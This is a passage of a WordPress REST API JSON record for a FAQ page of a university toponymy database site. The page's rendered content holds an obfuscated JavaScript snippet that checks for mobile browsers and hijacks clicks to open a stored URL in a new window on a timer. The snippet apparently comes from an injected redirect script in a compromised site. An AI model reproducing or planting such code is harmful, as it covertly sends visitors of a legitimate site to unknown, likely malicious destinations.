)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column icons_position=&#8221;left&#8221;][vc_tta_accordion][vc_tta_section title=&#8221;O que posso pesquisar na BUSCA?&#8221; tab_id=&#8221;1675132980558-39470064-381e&#8221;][vc_column_text]O usu\u00e1rio pode recuperar as informa\u00e7\u00f5es pesquisando qualquer palavra presente no Banco de Dados, que se apresenta como uma Tabela, cujos dados de entrada est\u00e3o em linhas&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_mi_skip_tracking":false,"_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"class_list":["post-280","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/comments?post=280"}],"version-history":[{"count":12,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/280\/revisions"}],"predecessor-version":[{"id":1112,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/280\/revisions\/1112"}],"wp:attachment":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/media?parent=280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}